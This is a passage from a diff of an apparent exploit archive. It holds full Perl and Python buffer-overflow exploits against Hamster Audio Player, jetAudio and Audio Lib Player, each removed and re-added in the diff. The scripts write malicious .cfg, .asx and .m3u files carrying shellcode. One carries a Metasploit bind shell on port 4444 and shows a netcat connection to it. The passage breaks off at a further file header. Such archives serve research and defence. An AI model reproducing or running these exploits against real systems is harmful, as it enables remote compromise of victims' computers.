-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> Associations.cfg');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-09-01]
+#!/usr/bin/perl
+# by ThE g0bL!N
+# Hamster Audio Player 0.3a (Associations.cfg) Local Buffer Exploit (SEH)
+#usage: after clicking on perl file put the cfg file on folder of hamster then open the program after that select option menu and boom Calc !!!
+############################################################################
+my $bof="\x41" x 4108;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\xB8\x15\xC6\x72";
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> Associations.cfg');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-09-01]
diff --git a/platforms/windows/local/9580.pl b/platforms/windows/local/9580.pl
index 0cf814f5a..e1c097562 100755
--- a/platforms/windows/local/9580.pl
+++ b/platforms/windows/local/9580.pl
@@ -1,41 +1,41 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# Hamster Audio Player 0.3a (Associations.cfg) Local Buffer Exploit //sp2(SEH)
-# Original exploit::http://www.milw0rm.com/exploits/9567
-# put the cfg file on folder of hamster then open
-# the program after that select option menu and boom Calc !!!
-############################################################################
-my $bof="\x41" x 4108;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\xbe\x2e\xd1\x72";##test under sp2
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> Associations.cfg');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-09-03]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# Hamster Audio Player 0.3a (Associations.cfg) Local Buffer Exploit //sp2(SEH)
+# Original exploit::http://www.milw0rm.com/exploits/9567
+# put the cfg file on folder of hamster then open
+# the program after that select option menu and boom Calc !!!
+############################################################################
+my $bof="\x41" x 4108;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\xbe\x2e\xd1\x72";##test under sp2
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> Associations.cfg');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-09-03]
diff --git a/platforms/windows/local/9610.py b/platforms/windows/local/9610.py
index 0b1bac227..ebf55926f 100755
--- a/platforms/windows/local/9610.py
+++ b/platforms/windows/local/9610.py
@@ -1,91 +1,91 @@
-# Audio Lib Player m3u SEH overwrite
-# product: http://www.toocharger.com/telecharger/logiciels/audio-lib-player/19056.htm
-# Usage: Create playlist, load exploit.m3u and connect to shell on port 4444
-#
-# $ nc 192.168.1.131 4444
-# Microsoft Windows XP [Version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
-#
-# C:\Documents and Settings\blake\Desktop\ALP>
-
-import sys
-
-print "\n[*] Audio Lib Player m3u SEH Overwrite"
-print "[*] Written by Blake"
-print "[*] Tested on Windows XP SP3\n"
-
-
-# windows/shell_bind_tcp - 695 bytes
-# http://www.metasploit.com
-# Encoder: x86/alpha_mixed
-# EXITFUNC=seh, LPORT=4444, RHOST=
-
-shellcode = (
-"\xdd\xc1\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
-"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
-"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
-"\x4c\x42\x4a\x4a\x4b\x50\x4d\x4a\x48\x4b\x49\x4b\x4f\x4b\x4f"
-"\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b\x47"
-"\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f"
-"\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a"
-"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x46\x51"
-"\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x44\x34\x45\x57\x49"
-"\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4b\x44\x47\x4b"
-"\x46\x34\x47\x54\x47\x58\x43\x45\x4d\x35\x4c\x4b\x51\x4f\x46"
-"\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b"
-"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x44\x43\x46\x4c\x4c\x4b\x4b"
-"\x39\x42\x4c\x51\x34\x45\x4c\x43\x51\x49\x53\x50\x31\x49\x4b"
-"\x45\x34\x4c\x4b\x51\x53\x46\x50\x4c\x4b\x51\x50\x44\x4c\x4c"
-"\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51\x4e"
-"\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x48"
-"\x56\x42\x46\x50\x53\x43\x56\x43\x58\x50\x33\x50\x32\x43\x58"
-"\x43\x47\x43\x43\x47\x42\x51\x4f\x51\x44\x4b\x4f\x48\x50\x45"
-"\x38\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e\x36"
-"\x51\x4f\x4b\x39\x4d\x35\x45\x36\x4d\x51\x4a\x4d\x43\x38\x44"
-"\x42\x50\x55\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x43\x58\x49\x49"
-"\x43\x39\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x51\x43\x46"
-"\x33\x46\x33\x46\x33\x50\x53\x50\x43\x51\x43\x51\x53\x50\x53"
-"\x4b\x4f\x48\x50\x42\x46\x42\x48\x42\x31\x51\x4c\x43\x56\x46"
-"\x33\x4c\x49\x4b\x51\x4d\x45\x45\x38\x4e\x44\x44\x5a\x42\x50"
-"\x48\x47\x51\x47\x4b\x4f\x49\x46\x43\x5a\x44\x50\x46\x31\x46"
-"\x35\x4b\x4f\x4e\x30\x42\x48\x4e\x44\x4e\x4d\x46\x4e\x4d\x39"
-"\x50\x57\x4b\x4f\x49\x46\x51\x43\x51\x45\x4b\x4f\x4e\x30\x45"
-"\x38\x4b\x55\x51\x59\x4b\x36\x51\x59\x50\x57\x4b\x4f\x49\x46"
-"\x46\x30\x46\x34\x50\x54\x51\x45\x4b\x4f\x48\x50\x4d\x43\x45"
-"\x38\x4a\x47\x43\x49\x48\x46\x44\x39\x50\x57\x4b\x4f\x48\x56"
-"\x50\x55\x4b\x4f\x48\x50\x43\x56\x42\x4a\x45\x34\x43\x56\x43"
-"\x58\x43\x53\x42\x4d\x4c\x49\x4a\x45\x43\x5a\x50\x50\x46\x39"
-"\x46\x49\x48\x4c\x4b\x39\x4d\x37\x43\x5a\x50\x44\x4c\x49\x4b"
-"\x52\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32\x46\x4d"
-"\x4b\x4e\x51\x52\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x50\x38\x4e"
-"\x4b\x4e\x4b\x4e\x4b\x43\x58\x44\x32\x4b\x4e\x4e\x53\x45\x46"
-"\x4b\x4f\x43\x45\x47\x34\x4b\x4f\x4e\x36\x51\x4b\x46\x37\x51"
-"\x42\x50\x51\x50\x51\x50\x51\x43\x5a\x43\x31\x50\x51\x46\x31"
-"\x51\x45\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x48\x59\x43"
-"\x35\x48\x4e\x46\x33\x4b\x4f\x4e\x36\x42\x4a\x4b\x4f\x4b\x4f"
-"\x46\x57\x4b\x4f\x48\x50\x4c\x4b\x46\x37\x4b\x4c\x4b\x33\x49"
-"\x54\x45\x34\x4b\x4f\x48\x56\x46\x32\x4b\x4f\x4e\x30\x45\x38"
-"\x4c\x30\x4d\x5a\x44\x44\x51\x4f\x50\x53\x4b\x4f\x49\x46\x4b"
-"\x4f\x48\x50\x41\x41")
-
-payload = "\x41" * 420				# seh overwritten at 1224
-nops = "\x90" * 100				# Nop Sled
-sc = shellcode					# bind shell 695 bytes
-near_jmp = "\xe9\x10\xfd\xff\xff"		# near jump back -752 bytes
-seh = "\x6a\x19\x9a\x0f"			# 0x0f9a196a pop ebp; pop ebx; ret from [C:\WINDOWS\system32\VBAJET32.dll]
-next_seh = "\xeb\xf9\xff\xff"			# short jump back -7 
-junk = "\x43" * 572				# junk buffer
-
-
-print "[+] Creating malicious playlist"
-try:
-	file = open("exploit.m3u",'w')
-	file.write(payload + nops + sc + near_jmp + next_seh + seh + junk)
-	file.close()
-	print "[+] File created successfully"
-except:
-	print "[x] Could not create file"
-	sys.exit(0) 
-
-# milw0rm.com [2009-09-09]
+# Audio Lib Player m3u SEH overwrite
+# product: http://www.toocharger.com/telecharger/logiciels/audio-lib-player/19056.htm
+# Usage: Create playlist, load exploit.m3u and connect to shell on port 4444
+#
+# $ nc 192.168.1.131 4444
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+#
+# C:\Documents and Settings\blake\Desktop\ALP>
+
+import sys
+
+print "\n[*] Audio Lib Player m3u SEH Overwrite"
+print "[*] Written by Blake"
+print "[*] Tested on Windows XP SP3\n"
+
+
+# windows/shell_bind_tcp - 695 bytes
+# http://www.metasploit.com
+# Encoder: x86/alpha_mixed
+# EXITFUNC=seh, LPORT=4444, RHOST=
+
+shellcode = (
+"\xdd\xc1\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
+"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
+"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
+"\x4c\x42\x4a\x4a\x4b\x50\x4d\x4a\x48\x4b\x49\x4b\x4f\x4b\x4f"
+"\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b\x47"
+"\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f"
+"\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a"
+"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x46\x51"
+"\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x44\x34\x45\x57\x49"
+"\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4b\x44\x47\x4b"
+"\x46\x34\x47\x54\x47\x58\x43\x45\x4d\x35\x4c\x4b\x51\x4f\x46"
+"\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b"
+"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x44\x43\x46\x4c\x4c\x4b\x4b"
+"\x39\x42\x4c\x51\x34\x45\x4c\x43\x51\x49\x53\x50\x31\x49\x4b"
+"\x45\x34\x4c\x4b\x51\x53\x46\x50\x4c\x4b\x51\x50\x44\x4c\x4c"
+"\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51\x4e"
+"\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x48"
+"\x56\x42\x46\x50\x53\x43\x56\x43\x58\x50\x33\x50\x32\x43\x58"
+"\x43\x47\x43\x43\x47\x42\x51\x4f\x51\x44\x4b\x4f\x48\x50\x45"
+"\x38\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e\x36"
+"\x51\x4f\x4b\x39\x4d\x35\x45\x36\x4d\x51\x4a\x4d\x43\x38\x44"
+"\x42\x50\x55\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x43\x58\x49\x49"
+"\x43\x39\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x51\x43\x46"
+"\x33\x46\x33\x46\x33\x50\x53\x50\x43\x51\x43\x51\x53\x50\x53"
+"\x4b\x4f\x48\x50\x42\x46\x42\x48\x42\x31\x51\x4c\x43\x56\x46"
+"\x33\x4c\x49\x4b\x51\x4d\x45\x45\x38\x4e\x44\x44\x5a\x42\x50"
+"\x48\x47\x51\x47\x4b\x4f\x49\x46\x43\x5a\x44\x50\x46\x31\x46"
+"\x35\x4b\x4f\x4e\x30\x42\x48\x4e\x44\x4e\x4d\x46\x4e\x4d\x39"
+"\x50\x57\x4b\x4f\x49\x46\x51\x43\x51\x45\x4b\x4f\x4e\x30\x45"
+"\x38\x4b\x55\x51\x59\x4b\x36\x51\x59\x50\x57\x4b\x4f\x49\x46"
+"\x46\x30\x46\x34\x50\x54\x51\x45\x4b\x4f\x48\x50\x4d\x43\x45"
+"\x38\x4a\x47\x43\x49\x48\x46\x44\x39\x50\x57\x4b\x4f\x48\x56"
+"\x50\x55\x4b\x4f\x48\x50\x43\x56\x42\x4a\x45\x34\x43\x56\x43"
+"\x58\x43\x53\x42\x4d\x4c\x49\x4a\x45\x43\x5a\x50\x50\x46\x39"
+"\x46\x49\x48\x4c\x4b\x39\x4d\x37\x43\x5a\x50\x44\x4c\x49\x4b"
+"\x52\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32\x46\x4d"
+"\x4b\x4e\x51\x52\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x50\x38\x4e"
+"\x4b\x4e\x4b\x4e\x4b\x43\x58\x44\x32\x4b\x4e\x4e\x53\x45\x46"
+"\x4b\x4f\x43\x45\x47\x34\x4b\x4f\x4e\x36\x51\x4b\x46\x37\x51"
+"\x42\x50\x51\x50\x51\x50\x51\x43\x5a\x43\x31\x50\x51\x46\x31"
+"\x51\x45\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x48\x59\x43"
+"\x35\x48\x4e\x46\x33\x4b\x4f\x4e\x36\x42\x4a\x4b\x4f\x4b\x4f"
+"\x46\x57\x4b\x4f\x48\x50\x4c\x4b\x46\x37\x4b\x4c\x4b\x33\x49"
+"\x54\x45\x34\x4b\x4f\x48\x56\x46\x32\x4b\x4f\x4e\x30\x45\x38"
+"\x4c\x30\x4d\x5a\x44\x44\x51\x4f\x50\x53\x4b\x4f\x49\x46\x4b"
+"\x4f\x48\x50\x41\x41")
+
+payload = "\x41" * 420				# seh overwritten at 1224
+nops = "\x90" * 100				# Nop Sled
+sc = shellcode					# bind shell 695 bytes
+near_jmp = "\xe9\x10\xfd\xff\xff"		# near jump back -752 bytes
+seh = "\x6a\x19\x9a\x0f"			# 0x0f9a196a pop ebp; pop ebx; ret from [C:\WINDOWS\system32\VBAJET32.dll]
+next_seh = "\xeb\xf9\xff\xff"			# short jump back -7 
+junk = "\x43" * 572				# junk buffer
+
+
+print "[+] Creating malicious playlist"
+try:
+	file = open("exploit.m3u",'w')
+	file.write(payload + nops + sc + near_jmp + next_seh + seh + junk)
+	file.close()
+	print "[+] File created successfully"
+except:
+	print "[x] Could not create file"
+	sys.exit(0) 
+
+# milw0rm.com [2009-09-09]
diff --git a/platforms/windows/local/9619.pl b/platforms/windows/local/9619.pl
index 2104d22a4..776dddb8f 100755
--- a/platforms/windows/local/9619.pl
+++ b/platforms/windows/local/9619.pl
@@ -1,46 +1,46 @@
-#!/usr/bin/perl
-# Found By :: HACK4LOVE
-# hack4love@hotmail.com
-# jetAudio v 7.1.9.4030 plus vx(asx/wax/wvx)Universal Local BOF (SEH)
-#######################################################################
-# use-->>open file-->>hac4love.asx >>>after that just move the mouse to
-## information box in the jetAudio program without click boom calc !!!
-#######################################################################
-##http://www.jetaudio.com/
-#######################################################################
-## work sooooooo good have fun
-#######################################################################
-my $bof="http://"."\x41" x 1017;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\xc3\x20\x40\x5f";##C:\Program Files\JetAudio\MFC42.DLL
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> HACK4LOVE.asx');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-09-09]
+#!/usr/bin/perl
+# Found By :: HACK4LOVE
+# hack4love@hotmail.com
+# jetAudio v 7.1.9.4030 plus vx(asx/wax/wvx)Universal Local BOF (SEH)
+#######################################################################
+# use-->>open file-->>hac4love.asx >>>after that just move the mouse to
+## information box in the jetAudio program without click boom calc !!!
+#######################################################################
+##http://www.jetaudio.com/
+#######################################################################
+## work sooooooo good have fun
+#######################################################################
+my $bof="http://"."\x41" x 1017;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\xc3\x20\x40\x5f";##C:\Program Files\JetAudio\MFC42.DLL
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> HACK4LOVE.asx');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-09-09]
diff --git a/platforms/windows/local/9624.py b/platforms/windows/local/9624.py
index 60d2ae741..0a1732b7e 100755
--- a/platforms/windows/local/9624.py
